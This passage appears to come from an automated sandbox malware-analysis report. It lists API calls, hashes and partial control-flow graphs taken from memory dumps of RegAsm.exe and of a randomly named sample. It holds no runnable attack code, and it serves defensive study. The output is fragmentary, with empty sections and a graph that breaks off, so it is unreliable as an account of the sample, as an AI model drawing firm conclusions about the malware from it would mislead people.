                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: ExceptionRaise___std_exception_copy
                                                                                                                                                                                                                                          • String ID: ios_base::badbit set$ios_base::eofbit set$ios_base::failbit set
                                                                                                                                                                                                                                          • API String ID: 3109751735-1866435925
                                                                                                                                                                                                                                          • Opcode ID: 6db5754c0c3f7c630e456a44fc8a01ec81c9786fca09fcb0a19a2d9224875447
                                                                                                                                                                                                                                          • Instruction ID: 39c8128b798e2086e3302e8ab46e2dce8cada1f1b911e2d41b88b79c7a5bec65
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 6db5754c0c3f7c630e456a44fc8a01ec81c9786fca09fcb0a19a2d9224875447
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: BD1136B29107156BC710DF68D801B86B3E8AF08310F14853FFA54E7291F778E804CBA9
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • IsProcessorFeaturePresent.KERNEL32(00000017), ref: 00407DA8
                                                                                                                                                                                                                                          • ___raise_securityfailure.LIBCMT ref: 00407E90
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000005.00000002.2098178516.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_5_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: FeaturePresentProcessor___raise_securityfailure
                                                                                                                                                                                                                                          • String ID: #7@$@SC
                                                                                                                                                                                                                                          • API String ID: 3761405300-54278199
                                                                                                                                                                                                                                          • Opcode ID: be0408e9841c2604ed6c70be4b6810e12912a1b256ed321422f905974070e74f
                                                                                                                                                                                                                                          • Instruction ID: 0d92a2c854cdd6e88b4d1eeb56e5bf4da0bfe8ec24aca00867b110679a0b03e4
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: be0408e9841c2604ed6c70be4b6810e12912a1b256ed321422f905974070e74f
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: DA2107B4640A00DBD318CF15F9857943BF4BB68355FA0643AE9088B3B1D3B46485CF1E
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • LoadLibraryExW.KERNEL32(00000011,00000000,00000800,?,0040B723,00000000,00000001,0043568C,?,?,?,0040B8C6,00000004,InitializeCriticalSectionEx,00427C38,InitializeCriticalSectionEx), ref: 0040B77F
                                                                                                                                                                                                                                          • GetLastError.KERNEL32(?,0040B723,00000000,00000001,0043568C,?,?,?,0040B8C6,00000004,InitializeCriticalSectionEx,00427C38,InitializeCriticalSectionEx,00000000,?,0040B67D), ref: 0040B789
                                                                                                                                                                                                                                          • LoadLibraryExW.KERNEL32(00000011,00000000,00000000,?,00000011,0040A593), ref: 0040B7B1
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000005.00000002.2098178516.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_5_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: LibraryLoad$ErrorLast
                                                                                                                                                                                                                                          • String ID: api-ms-
                                                                                                                                                                                                                                          • API String ID: 3177248105-2084034818
                                                                                                                                                                                                                                          • Opcode ID: 22226141dfb546a2f16a4bc61347b62053759e468ff986d8c484c8ccf3c75455
                                                                                                                                                                                                                                          • Instruction ID: 4a96934300341e5ece3864587fe3feae18b3ac400cb1fe2ce3454729e361f76d
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 22226141dfb546a2f16a4bc61347b62053759e468ff986d8c484c8ccf3c75455
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 29E01A30384208BBEF205B61EC06F5A3E64EB40B85F904031FB0DE91E1E775A9519ACC
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • GetConsoleOutputCP.KERNEL32(50A26BB6,00000000,00000000,0040BDB8), ref: 00416525
                                                                                                                                                                                                                                            • Part of subcall function 0041B08B: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,?,0000FDE9,00000000,-00000008,00000000,?,00419056,?,00000000,-00000008), ref: 0041B137
                                                                                                                                                                                                                                          • WriteFile.KERNEL32(?,?,00000000,?,00000000), ref: 00416780
                                                                                                                                                                                                                                          • WriteFile.KERNEL32(?,?,00000001,?,00000000), ref: 004167C8
                                                                                                                                                                                                                                          • GetLastError.KERNEL32 ref: 0041686B
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000005.00000002.2098178516.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_5_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: FileWrite$ByteCharConsoleErrorLastMultiOutputWide
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 2112829910-0
                                                                                                                                                                                                                                          • Opcode ID: 82cd919ffc66cdbec26423ec8f462efebf3297e9721ada9a3fb481d80f0d1854
                                                                                                                                                                                                                                          • Instruction ID: 1bb8143dd65314e62236f50c93da9e0a6d801424c5e2e01ca8c3ea5794d6433d
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 82cd919ffc66cdbec26423ec8f462efebf3297e9721ada9a3fb481d80f0d1854
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 7DD158B5E002589FCB11DFA9D880AEDBBB5FF48304F19412AE856E7351D734E882CB58
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000005.00000002.2098178516.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_5_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: AdjustPointer
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 1740715915-0
                                                                                                                                                                                                                                          • Opcode ID: 651f461737145a99faeddf7e9cbc434de1019a0abfbd738a44b85bf0bb0bacfa
                                                                                                                                                                                                                                          • Instruction ID: 639cff4bd66d4eed68713a8ae307c2d2d1180f9e9004782a502f2a6fa8fea26a
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 651f461737145a99faeddf7e9cbc434de1019a0abfbd738a44b85bf0bb0bacfa
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 3D51CF72A00302AFEB29AF52C941B7A73A4EF40304F14853FE805672D1D739EC62C79A
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                            • Part of subcall function 0041B08B: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,?,0000FDE9,00000000,-00000008,00000000,?,00419056,?,00000000,-00000008), ref: 0041B137
                                                                                                                                                                                                                                          • GetLastError.KERNEL32 ref: 0041B50B
                                                                                                                                                                                                                                          • __dosmaperr.LIBCMT ref: 0041B512
                                                                                                                                                                                                                                          • GetLastError.KERNEL32(?,?,?,?), ref: 0041B54C
                                                                                                                                                                                                                                          • __dosmaperr.LIBCMT ref: 0041B553
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000005.00000002.2098178516.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_5_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: ErrorLast__dosmaperr$ByteCharMultiWide
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 1913693674-0
                                                                                                                                                                                                                                          • Opcode ID: 98539fc020fd00bd43affe0888965e6ed426553bce3dc314c44ab490fe6ade4c
                                                                                                                                                                                                                                          • Instruction ID: cec987ca27f54d0df3a57789ab5f391b1316bc0051da666ab1eca3c5aeea150a
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 98539fc020fd00bd43affe0888965e6ed426553bce3dc314c44ab490fe6ade4c
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 3221B671600215BFDB20EF66C8418ABB7ADFF043A8710852FF85997251D779ED9087D4
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000005.00000002.2098178516.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_5_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                          • Opcode ID: 66e116e2024aada6cab71803717b56169a7abbe351efb3759331a0be8796517d
                                                                                                                                                                                                                                          • Instruction ID: f8db4804455f599fb5fabd8b5f86bcd1d132503182311fbe19c9dedc91394c0d
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 66e116e2024aada6cab71803717b56169a7abbe351efb3759331a0be8796517d
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 8F21F9B1610205AFEB20AF62CC90DAB776CFF40368710452BF415D7252D7B9EDD097A8
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • GetEnvironmentStringsW.KERNEL32 ref: 0041C445
                                                                                                                                                                                                                                            • Part of subcall function 0041B08B: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,?,0000FDE9,00000000,-00000008,00000000,?,00419056,?,00000000,-00000008), ref: 0041B137
                                                                                                                                                                                                                                          • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 0041C47D
                                                                                                                                                                                                                                          • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 0041C49D
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000005.00000002.2098178516.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_5_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: EnvironmentStrings$Free$ByteCharMultiWide
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 158306478-0
                                                                                                                                                                                                                                          • Opcode ID: 4d096bac32b07df6f96bbfc29f435c2dddc1c3056e5e13fb52e26ce166ed4541
                                                                                                                                                                                                                                          • Instruction ID: cd346ceb72f841712861b774b6322b7d2f9c84398f992d5f92ec2fcb375f728e
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 4d096bac32b07df6f96bbfc29f435c2dddc1c3056e5e13fb52e26ce166ed4541
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 091104B2A48515BF672127B25CDACFF6D5CDE99398310402AF802D2102EE2CDD8285BD
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • WriteConsoleW.KERNEL32(00000000,00000000,?,00000000,00000000,?,00421C44,00000000,00000001,00000000,0040BDB8,?,004168BF,0040BDB8,00000000,00000000), ref: 004241FE
                                                                                                                                                                                                                                          • GetLastError.KERNEL32(?,00421C44,00000000,00000001,00000000,0040BDB8,?,004168BF,0040BDB8,00000000,00000000,0040BDB8,0040BDB8,?,00416E7D,?), ref: 0042420A
                                                                                                                                                                                                                                            • Part of subcall function 004241D0: CloseHandle.KERNEL32(FFFFFFFE,0042421A,?,00421C44,00000000,00000001,00000000,0040BDB8,?,004168BF,0040BDB8,00000000,00000000,0040BDB8,0040BDB8), ref: 004241E0
                                                                                                                                                                                                                                          • ___initconout.LIBCMT ref: 0042421A
                                                                                                                                                                                                                                            • Part of subcall function 00424192: CreateFileW.KERNEL32(CONOUT$,40000000,00000003,00000000,00000003,00000000,00000000,004241C1,00421C31,0040BDB8,?,004168BF,0040BDB8,00000000,00000000,0040BDB8), ref: 004241A5
                                                                                                                                                                                                                                          • WriteConsoleW.KERNEL32(00000000,00000000,?,00000000,?,00421C44,00000000,00000001,00000000,0040BDB8,?,004168BF,0040BDB8,00000000,00000000,0040BDB8), ref: 0042422F
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000005.00000002.2098178516.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_5_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: ConsoleWrite$CloseCreateErrorFileHandleLast___initconout
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 2744216297-0
                                                                                                                                                                                                                                          • Opcode ID: ca09305258c16a54d0dcba451752d25af7c96ee1953d8ec0ee725fe34d53713b
                                                                                                                                                                                                                                          • Instruction ID: 4f4531f6176a0c5b6c9a7a905856594723a902087f3f8d784f297790ae8fc46e
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: ca09305258c16a54d0dcba451752d25af7c96ee1953d8ec0ee725fe34d53713b
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: C1F03736200124BBCF222FD5FC0899A7F26FB853B0F414065FA5995130C6319870AB99
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • __startOneArgErrorHandling.LIBCMT ref: 0041033D
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000005.00000002.2098178516.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_5_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: ErrorHandling__start
                                                                                                                                                                                                                                          • String ID: pow
                                                                                                                                                                                                                                          • API String ID: 3213639722-2276729525
                                                                                                                                                                                                                                          • Opcode ID: c0cf26b477ce003e2ec9021a6fbfbc89d90c79d8eb5fc1b2203591be7fd8a1bc
                                                                                                                                                                                                                                          • Instruction ID: ba283ab10e86f0ff01337ebee0106e11519cd21400a500e12903ed81b54b832b
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: c0cf26b477ce003e2ec9021a6fbfbc89d90c79d8eb5fc1b2203591be7fd8a1bc
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: CD517EB1A4A6068BCB117714DA413EB37A09B40701F604D6BE8D5413E9EB7D8CF69A4F
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • ___std_exception_copy.LIBVCRUNTIME ref: 00401F9D
                                                                                                                                                                                                                                            • Part of subcall function 00408090: RaiseException.KERNEL32(E06D7363,00000001,00000003,00407FAB,?,?,?,?,00407FAB,0000000C,00432FA4,0000000C), ref: 004080F0
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000005.00000002.2098178516.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_5_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: ExceptionRaise___std_exception_copy
                                                                                                                                                                                                                                          • String ID: ios_base::badbit set$ios_base::failbit set
                                                                                                                                                                                                                                          • API String ID: 3109751735-1240500531
                                                                                                                                                                                                                                          • Opcode ID: 093cf63a05e0c9d9e505c411f0024045c7293edf30539a5a4b0b12754ed88584
                                                                                                                                                                                                                                          • Instruction ID: 797d091bbb829d4e8b0eea89e00af225cce609620468ab5527f299f1bcc47ce9
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 093cf63a05e0c9d9e505c411f0024045c7293edf30539a5a4b0b12754ed88584
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 2D414771504301AFC304DF29C841A9BB7E8EF89310F14862FF994A76A1E778E945CB99
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • ___except_validate_context_record.LIBVCRUNTIME ref: 0040A46F
                                                                                                                                                                                                                                          • __IsNonwritableInCurrentImage.LIBCMT ref: 0040A523
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000005.00000002.2098178516.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_5_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: CurrentImageNonwritable___except_validate_context_record
                                                                                                                                                                                                                                          • String ID: csm
                                                                                                                                                                                                                                          • API String ID: 3480331319-1018135373
                                                                                                                                                                                                                                          • Opcode ID: ca5a29bd391d885cd4634227e419514380eff920c463d90092caad24f93c2f58
                                                                                                                                                                                                                                          • Instruction ID: 2e999a1580a82348229a279466bd0bfc2513c0ac70a5a2249b741fcd72562a23
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: ca5a29bd391d885cd4634227e419514380eff920c463d90092caad24f93c2f58
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 2741C834A00318ABCF10DF69C844A9E7BB0FF45314F1481A6E8146B3D2D779E961CB9A
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • EncodePointer.KERNEL32(00000000,?), ref: 0040AD62
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000005.00000002.2098178516.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_5_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: EncodePointer
                                                                                                                                                                                                                                          • String ID: MOC$RCC
                                                                                                                                                                                                                                          • API String ID: 2118026453-2084237596
                                                                                                                                                                                                                                          • Opcode ID: 5b710ab2a9f474c2cc4afd51bace25907f511bb75432380764933eab186ad071
                                                                                                                                                                                                                                          • Instruction ID: a4c454b0bcb5eef0a2e58a0d06434270c6490fd8828ce8058ef1224e804d7477
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 5b710ab2a9f474c2cc4afd51bace25907f511bb75432380764933eab186ad071
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 4C416E71900209AFCF15DFA4CD81AEEBBB5FF48304F19846AF904B7291D3399960DB95
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • IsProcessorFeaturePresent.KERNEL32(00000017), ref: 00407EAE
                                                                                                                                                                                                                                          • ___raise_securityfailure.LIBCMT ref: 00407F6B
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000005.00000002.2098178516.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_5_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: FeaturePresentProcessor___raise_securityfailure
                                                                                                                                                                                                                                          • String ID: @SC
                                                                                                                                                                                                                                          • API String ID: 3761405300-4053289583
                                                                                                                                                                                                                                          • Opcode ID: ee42222a1a21f84a104741ef492a216a118de1db3b1281724e16a62be68f0859
                                                                                                                                                                                                                                          • Instruction ID: 10e33e2e5eb9a3d5286ccbecc20551b6eaee076d59bf9c7ce06d7c1cd455d27c
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: ee42222a1a21f84a104741ef492a216a118de1db3b1281724e16a62be68f0859
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 2D11E3B4651A04DBD318CF15F8817883BA4BB28346B50B03AE8088B371E3B09595CF5E
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • std::_Lockit::_Lockit.LIBCPMT ref: 00401875
                                                                                                                                                                                                                                          • std::_Locinfo::_Locinfo_ctor.LIBCPMT ref: 004018BA
                                                                                                                                                                                                                                            • Part of subcall function 004058AA: _Yarn.LIBCPMT ref: 004058C9
                                                                                                                                                                                                                                            • Part of subcall function 004058AA: _Yarn.LIBCPMT ref: 004058ED
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000005.00000002.2098178516.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_5_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: Yarnstd::_$Locinfo::_Locinfo_ctorLockitLockit::_
                                                                                                                                                                                                                                          • String ID: bad locale name
                                                                                                                                                                                                                                          • API String ID: 1908188788-1405518554
                                                                                                                                                                                                                                          • Opcode ID: 72551ae77e736be2171b1fcc8d603e91bdd62b17c33b334120392a8c0c99013b
                                                                                                                                                                                                                                          • Instruction ID: 698a41e2f8890499ec269fe88a942146f7bab7e11b1414401b60b7a9d3f26e65
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 72551ae77e736be2171b1fcc8d603e91bdd62b17c33b334120392a8c0c99013b
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 90F01D71515B408ED370DF3A8404743BEE0AF29714F048E2EE4CAD7A92E379E508CBA9
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000005.00000002.2098178516.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_5_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: H_prolog3
                                                                                                                                                                                                                                          • String ID: A]@$pdB
                                                                                                                                                                                                                                          • API String ID: 431132790-1964063989
                                                                                                                                                                                                                                          • Opcode ID: a80e33e7d8d27686206c715740f2a372a192bd8069830a42d80d814282e980e6
                                                                                                                                                                                                                                          • Instruction ID: 9708e6e5fcb6faf266b2e239077eb0a834cba51f5faa1665736d4655e106cb5a
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: a80e33e7d8d27686206c715740f2a372a192bd8069830a42d80d814282e980e6
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: AE01D6B4A00615CFC761DF68C580A5ABBF0FF08344B51896EE489DB751D7B5AA40CF98

                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                                                          control_flow_graph 842 53a5310-53a5330 843 53a5332-53a5343 842->843 844 53a5393-53a5450 call 53a48a0 842->844 848 53a5455-53a5456 844->848
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000009.00000002.2117174698.00000000053A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 053A0000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_9_2_53a0000_Z73fDV6g4L.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                          • Opcode ID: c4b47fb59887c2dbece4b8671c76a04945bb7bb63d3d25dc40b82e8ca9ef16b7
                                                                                                                                                                                                                                          • Instruction ID: 22a64e100906d596bd73cdceaec364c125b35b717c76af2eadd40fe9ec88a53e
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: c4b47fb59887c2dbece4b8671c76a04945bb7bb63d3d25dc40b82e8ca9ef16b7
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 437114B2C04248AFCF01CFA5C984ACEBFB5EF59350F55816AE909AB251D3759845CB90

                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                                                          control_flow_graph 849 53a4858-53a54d6 856 53a54d8-53a54de 849->856 857 53a54e1-53a54e8 849->857 856->857 858 53a54ea-53a54f0 857->858 859 53a54f3-53a552b 857->859 858->859 860 53a5533-53a5592 CreateWindowExW 859->860 861 53a559b-53a55d3 860->861 862 53a5594-53a559a 860->862 866 53a55e0 861->866 867 53a55d5-53a55d8 861->867 862->861 868 53a55e1 866->868 867->866 868->868
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 053A5582
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000009.00000002.2117174698.00000000053A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 053A0000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_9_2_53a0000_Z73fDV6g4L.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: CreateWindow
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 716092398-0
                                                                                                                                                                                                                                          • Opcode ID: 07f1f4c80dcf36f16d75f4dcc0303f1a5802d7b3ab2fc9ecf16ffea9f4a9ee98
                                                                                                                                                                                                                                          • Instruction ID: c041b46d6deaaf513acea290712239769c80c1f6d208bbd5b69c3295852fd158
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 07f1f4c80dcf36f16d75f4dcc0303f1a5802d7b3ab2fc9ecf16ffea9f4a9ee98
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 615134B2C043589FDB14DFA9C994ACEBFB5FF49300F24812AE819AB251D7749885CF90

                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                                                          control_flow_graph 869 53a48a0-53a54d6 871 53a54d8-53a54de 869->871 872 53a54e1-53a54e8 869->872 871->872 873 53a54ea-53a54f0 872->873 874 53a54f3-53a5592 CreateWindowExW 872->874 873->874 876 53a559b-53a55d3 874->876 877 53a5594-53a559a 874->877 881 53a55e0 876->881 882 53a55d5-53a55d8 876->882 877->876 883 53a55e1 881->883 882->881 883->883
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 053A5582
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000009.00000002.2117174698.00000000053A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 053A0000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_9_2_53a0000_Z73fDV6g4L.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: CreateWindow
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 716092398-0
                                                                                                                                                                                                                                          • Opcode ID: afcd1d65350d8fdf651f6ee1520a69656cdea9309a51c7c2c01d0cdb0b845c47
                                                                                                                                                                                                                                          • Instruction ID: 3ef6dbcb850e621e9939fbb657fbc8bb5b248b86f1367f5184157690e1266596
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: afcd1d65350d8fdf651f6ee1520a69656cdea9309a51c7c2c01d0cdb0b845c47
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 5C51AFB1D003499FDF14CFA9C984ADEBBB6FF48314F24812AE819AB250D775A945CF90

                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                                                          • Not Executed
